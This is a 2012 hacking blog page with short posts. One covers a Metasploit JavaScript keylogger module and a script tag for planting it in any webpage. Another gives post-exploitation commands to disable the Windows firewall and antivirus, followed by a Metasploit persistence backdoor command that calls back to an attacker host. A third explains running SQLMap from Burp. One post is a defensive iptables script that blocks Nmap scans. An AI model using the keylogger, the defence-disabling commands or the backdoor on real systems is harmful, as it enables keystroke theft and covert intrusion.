Feb 23, 2012

Keylogging with Metasploit & Javascript

If you want the detail, please go to the Source.

Step 1: Module setup:

msf > use auxiliary/server/capture/http_javascript_keylogger 
msf  auxiliary(http_javascript_keylogger) > set demo true
demo => true
msf  auxiliary(http_javascript_keylogger) > show options


Module options (auxiliary/server/capture/http_javascript_keylogger):


   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DEMO        true             yes       Creates HTML for demo purposes
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


msf  auxiliary(http_javascript_keylogger) > run


[*] Using URL: http://0.0.0.0:8080/qZBRzd
[*]  Local IP: http://192.168.1.131:8080/qZBRzd
[*] Server started.


Step 2: Demo page URL
Screen Shot 2012-02-21 at 9.50.02 AM.png
Step 3 (Optional) : To embed the keylogger into any webpage, use a reachable URL along with HTML <script> tag appended with "/[whatever].js".

<script type="text/javascript" src="http://192.168.1.131:8080/qZBRzd/test.js">

Screen Capture 1: Module setup and run
Screen Shot 2012-02-21 at 9.46.21 AM.png
Screen Capture 2: Demo page
Screen Shot 2012-02-21 at 10.00.24 AM.png
Screen Capture 3: Keystrokes captured and stored to loot




Screen Shot 2012-02-21 at 10.00.07 AM.png

Source: https://community.rapid7.com/community/metasploit/blog/2012/02/21/metasploit-javascript-keylogger

If you like my blog, Please Donate Me

Feb 22, 2012

IPTABLES Shell Script For Block NMAP

#!/bin/bash
# To run this file, first give the permission +x and execute this program
# --# chmod +x blocknmap.sh
# --# ./blocknmap.sh

echo "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1"
echo "3                                                                      3"
echo "3     ________   .__          ________                                 3"
echo "7     \______ \  |__|  ______/   __   \     ____    ____    _____      7"
echo "1      |    |  \ |  | /  ___/\____    /   _/ ___\  /  _ \  /     \     1"
echo "3      |        \|  | \___ \    /    /    \  \___ (  <_> )|  Y Y  \    3"
echo "3     /_______  /|__|/____  >  /____/   /\ \___  > \____/ |__|_|  /    3"
echo "7             \/          \/            \/     \/               \/     7"
echo "1                                                                      1"
echo "3              >> The Underground Exploitation Team                    3"
echo "3                                                                      3"
echo "7                                                                      7"
echo "1          [+] Site   : http://www.Dis9.com                            1"
echo "3                                                                      3"
echo "3                                                                      3"
echo "7            ###############################################           7"
echo "1            I'm Liyan Oz Leader of Underground Exploitation           1"
echo "3            ###############################################           3"
echo "3                                                                      3"                                           
echo "7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7"
echo "========================================================================"
echo "=                  Block Nmap Scanning using iptables                  ="
echo "=                         C0ded by Liyan Oz                            ="
echo "=                      http://0nto.wordpress.com                       ="
echo "========================================================================"   
echo ""
echo ""
#=====================
# Enable IP Forward
#---------------------

echo 1 > /proc/sys/net/ipv4/ip_forward

#=====================
# Flush semua rules
#---------------------
/sbin/iptables -F
/sbin/iptables -t nat -F

#=====================
# Block
#---------------------

/sbin/iptables -t filter -A INPUT -p TCP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p UDP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p ICMP -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -m state --state INVALID -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,FIN FIN -j LOG --log-prefix "FIN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,FIN FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,PSH PSH -j LOG --log-prefix "PSH: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,PSH PSH -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,URG URG -j LOG --log-prefix "URG: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ACK,URG URG -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL ALL -j LOG --log-prefix "XMAS scan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL ALL -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL NONE -j LOG --log-prefix "NULL scan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL NONE -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j LOG --log-prefix "pscan: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,FIN SYN,FIN -j LOG --log-prefix "pscan 2: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags FIN,RST FIN,RST -j LOG --log-prefix "pscan 2: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags FIN,RST FIN,RST -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,FIN -j LOG --log-prefix "SYNFIN-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL SYN,FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,FIN -j LOG --log-prefix "NMAP-XMAS-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL FIN -j LOG --log-prefix "FIN-SCAN: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -j LOG --log-prefix "NMAP-ID: "
/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags ALL URG,PSH,SYN,FIN -j DROP

/sbin/iptables -t filter -A INPUT   -p tcp --tcp-flags SYN,RST SYN,RST -j LOG --log-prefix "SYN-RST: "
 
Source: http://packetstormsecurity.org/files/110042/blocknmap.sh.txt


If you like my blog, Please Donate Me

Feb 21, 2012

Post Exploitation To Manage Firewall And Antivirus

Firewall
1. Show Firewall Operation Mode
> netsh firewall show opmode

C:\Documents and Settings\Administrator>netsh firewall show opmode

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Disable
Exception mode                    = Enable

Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode                  = Enable



2. If you want to disable firewall, use this command
> netsh firewall set opmode disable


Antivirus
1. If you want to find the Antivirus in task list, use this command(in this step, we will find "AVG Antivirus")
> tasklist /SVC | find /I 'avg'


2. For query information of the task, use
> sc queryex taskname


3. If you want to disable startup of the task use
> sc config taskname start=DISABLED

After all you can inject the backdoor in the machine :)
If you use Metasploit, try this command:
run persistance -A -L c:\\ -X -i 10 -p 443 -r  hackerip
 






If you like my blog, Please Donate Me

SQLMap plugin for Burpsuite [Add plugin for windows]

If you want the detail and who develop this plugin, please go to the Source.

1.  Firstly, Download the plugin
https://gason.googlecode.com/files/burpplugins.jar

2. Run the burpsuite with plugin
$ java -classpath burpplugins.jar:”BurpSuite_v1.4.01.jar” burp.StartBurp

3. Click right mouse button over the url you want to test with sqlmap and choose "Send to  sqlmap"

4. Configure the sqlmap option and click "Run"


Update SQLMap Plugin for Windows: http://www.praetorian.com/blog/burp-sqlmap-plugin-for-windows
Source: http://blog.buguroo.com/?p=2471&lang=en

If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |